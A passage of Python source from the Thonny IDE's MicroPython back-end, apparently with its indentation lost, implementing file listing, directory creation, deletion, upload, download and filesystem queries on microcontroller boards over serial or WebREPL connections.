# micro:bit
from os import size as __thonny_getsize
def __thonny_isdir(path):
return False
"""
)
)
self._execute_without_output(
dedent(
"""
def __thonny_rec_list_with_size(path):
result = {}
if __thonny_isdir(path):
for name in __thonny_os.listdir(path):
result.update(__thonny_rec_list_with_size(path + "/" + name))
else:
result[path] = __thonny_getsize(path)
return result
"""
)
)
result = []
for requested_path in paths:
sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
self._execute_without_output(
dedent(
"""
del __thonny_os
del __thonny_stat
del __thonny_getsize
del __thonny_isdir
del __thonny_rec_list_with_size
"""
)
)
return result
def _get_existing_remote_files(self, paths):
if self._supports_directories():
func = "stat"
else:
func = "size"
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
__thonny_result = []
for __thonny_path in %r:
try:
__thonny_os.%s(__thonny_path)
__thonny_result.append(__thonny_path)
except OSError:
pass
"""
)
% (paths, func),
cleanup=dedent(
"""
del __thonny_os
del __thonny_result
del __thonny_path
"""
),
)
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
else:
script = "os.stat(%r)[6]"
return self._evaluate(script % path, prelude="import os as __thonny_os")
def _makedirs(self, path):
if path == "/":
return
try:
self._makedirs_via_serial(path)
except Exception as e:
if "read-only" in str(e).lower():
self._makedirs_via_mount(path)
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
if path == "/":
return
path = path.rstrip("/")
script = (
dedent(
"""
import os as __thonny_os
__thonny_parts = %r.split('/')
for i in range(2, len(__thonny_parts) + 1):
__thonny_path = "/".join(__thonny_parts[:i])
try:
__thonny_os.stat(__thonny_path)
except OSError:
# does not exist
__thonny_os.mkdir(__thonny_path)
del __thonny_parts
try:
del __thonny_path
except:
pass
"""
)
% path
)
self._execute_without_output(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
if not self._supports_directories():
self._execute_without_output(
dedent(
"""
import os as __thonny_os
for __thonny_path in %r:
__thonny_os.remove(__thonny_path)
del __thonny_path
del __thonny_os
"""
)
% paths
)
else:
self._execute_without_output(
dedent(
"""
import os as __thonny_os
def __thonny_delete(path):
if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
for name in __thonny_os.listdir(path):
child_path = path + "/" + name
__thonny_delete(child_path)
__thonny_os.rmdir(path)
else:
__thonny_os.remove(path)
for __thonny_path in %r:
__thonny_delete(__thonny_path)
del __thonny_path
del __thonny_delete
del __thonny_os
"""
)
% paths
)
def _upload_file(self, source, target, notifier):
assert target.startswith("/") or not self._supports_directories()
target_dir, _ = linux_dirname_basename(target)
assert target_dir.startswith("/") or not self._supports_directories()
self._makedirs(target_dir)
def block_generator():
with open(source, "rb") as source_fp:
while True:
block = source_fp.read(512)
if block:
yield block
else:
break
return self._write_file(block_generator(), target, notifier=notifier)
def _download_file(self, source, target, notifier=None):
os.makedirs(os.path.dirname(target), exist_ok=True)
bytes_written = 0
with open(target, "wb") as out_fp:
for block in self._read_file(source):
out_fp.write(block)
os.fsync(out_fp)
bytes_written += len(block)
notifier(bytes_written)
return bytes_written
def _get_fs_mount_label(self):
# This method is most likely required with CircuitPython,
# so try its approach first
# https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
result = self._evaluate(
"__thonny_result",
prelude=dedent(
"""
try:
from storage import getmount as __thonny_getmount
try:
__thonny_result = __thonny_getmount("/").label
finally:
del __thonny_getmount
except ImportError:
__thonny_result = None
except OSError:
__thonny_result = None
"""
),
cleanup="del __thonny_result",
)
if result is not None:
return result
if self._welcome_text is None:
return None
"""
# following is not reliable and probably not needed
markers_by_name = {"PYBFLASH": {"pyb"}, "CIRCUITPY": {"circuitpython"}}
for name in markers_by_name:
for marker in markers_by_name[name]:
if marker.lower() in self._welcome_text.lower():
return name
"""
return None
def _get_flash_prefix(self):
if not self._supports_directories():
return ""
elif (
"LoBo" in self._welcome_text
or "WiPy with ESP32" in self._welcome_text
or "PYBLITE" in self._welcome_text
or "PYBv" in self._welcome_text
or "PYBOARD" in self._welcome_text.upper()
):
return "/flash/"
else:
return "/"
def _get_fs_mount(self):
label = self._get_fs_mount_label()
if label is None:
return None
else:
candidates = find_volumes_by_name(
self._get_fs_mount_label(),
# querying A can be very slow
skip_letters="A",
)
if len(candidates) == 0:
raise RuntimeError("Could not find volume " + self._get_fs_mount_label())
elif len(candidates) > 1:
raise RuntimeError("Found several possible mount points: %s" % candidates)
else:
return candidates[0]
def _get_fs_info(self, path):
result = self._evaluate(
dedent(
"""{
"total" : __thonny_total,
"used" : __thonny_used,
"free": __thonny_free,
"sizes": __thonny_sizes
}"""
),
prelude=dedent(
"""
try:
from os import statvfs as __thonny_statvfs
__thonny_stat = __thonny_statvfs(%r)
__thonny_total = __thonny_stat[2] * __thonny_stat[0]
__thonny_free = __thonny_stat[3] * __thonny_stat[0]
__thonny_used = __thonny_total - __thonny_free
__thonny_sizes = None
del __thonny_statvfs
del __thonny_stat
except ImportError:
import os as __thonny_os
__thonny_sizes = [__thonny_os.size(name) for name in __thonny_os.listdir()]
__thonny_used = None
__thonny_total = None
__thonny_free = None
del __thonny_os
"""
)
% path,
cleanup=dedent(
"""
del __thonny_total
del __thonny_free
del __thonny_used
del __thonny_sizes
"""
),
)
if result["sizes"] is not None:
if self._connected_to_microbit():
comment = "Assuming around 30 kB of storage space for user files."
else:
comment = "Don't know the size of storage space on this device."
files_total_size = sum(result["sizes"])
# TODO: compute number of used blocks
if files_total_size > 0:
comment += "\n\n" + "At least %s of it is used by %d file(s)." % (
sizeof_fmt(files_total_size),
len(result["sizes"]),
)
result["comment"] = comment
del result["sizes"]
return result
def _get_microbit_file_sizes(self):
return self._evaluate(
"{name : __thonny_os.size(name) for name in __thonny_os.listdir()}",
prelude="import os as __thonny_os",
cleanup="del __thonny_os",
)
def _get_dirs_child_data_generic(self, paths):
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
# Init all vars, so that they can be deleted
# even if the loop makes no iterations
__thonny_result = {}
__thonny_path = None
__thonny_st = None
__thonny_child_names = None
__thonny_children = None
__thonny_name = None
__thonny_real_path = None
__thonny_full = None
for __thonny_path in %(paths)r:
__thonny_real_path = __thonny_path or '/'
try:
__thonny_child_names = __thonny_os.listdir(__thonny_real_path)
except OSError:
# probably deleted directory
__thonny_children = None
else:
__thonny_children = {}
for __thonny_name in __thonny_child_names:
if __thonny_name.startswith('.') or __thonny_name == "System Volume Information":
continue
__thonny_full = (__thonny_real_path + '/' + __thonny_name).replace("//", "/")
__thonny_st = __thonny_os.stat(__thonny_full)
if __thonny_st[0] & 0o170000 == 0o040000:
# directory
__thonny_children[__thonny_name] = {"kind" : "dir", "size" : None}
else:
__thonny_children[__thonny_name] = {"kind" : "file", "size" :__thonny_st[6]}
__thonny_children[__thonny_name]["time"] = max(__thonny_st[8], __thonny_st[9])
__thonny_result[__thonny_path] = __thonny_children
"""
)
% {"paths": paths},
cleanup=dedent(
"""
del __thonny_os
del __thonny_st
del __thonny_children
del __thonny_name
del __thonny_path
del __thonny_full
del __thonny_result
del __thonny_real_path
"""
),
)
def _check_for_connection_errors(self):
self._connection._check_for_error()
def _on_connection_closed(self):
self._send_output(
"\n" + "Connection closed. Use 'Run → Stop / Restart' to reconnect." + "\n", "stderr"
)
sys.exit(EXPECTED_TERMINATION_CODE)
class ExecutionError(Exception):
pass
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
def linux_dirname_basename(path):
if path == "/":
return ("/", "")
if "/" not in path: # micro:bit
return "", path
path = path.rstrip("/")
dir_, file_ = path.rsplit("/", maxsplit=1)
if dir_ == "":
dir_ = "/"
return dir_, file_
def to_remote_path(path):
return path.replace("\\", "/")
class ReadOnlyFilesystemError(RuntimeError):
pass
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--clean", type=lambda s: True if s == "True" else False)
parser.add_argument("--port", type=str)
parser.add_argument("--url", type=str)
parser.add_argument("--password", type=str)
parser.add_argument("--api_stubs_path", type=str)
args = parser.parse_args()
port = None if args.port == "None" else args.port
try:
if port is None:
# remain busy
while True:
time.sleep(1000)
elif port == "webrepl":
from thonny.plugins.micropython.webrepl_connection import WebReplConnection
connection = WebReplConnection(args.url, args.password)
else:
from thonny.plugins.micropython.serial_connection import SerialConnection
connection = SerialConnection(port, BAUDRATE)
vm = MicroPythonBackend(connection, clean=args.clean, api_stubs_path=args.api_stubs_path)
except ConnectionFailedException as e:
text = "\n" + str(e) + "\n"
msg = BackendEvent(event_type="ProgramOutput", stream_name="stderr", data=text)
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.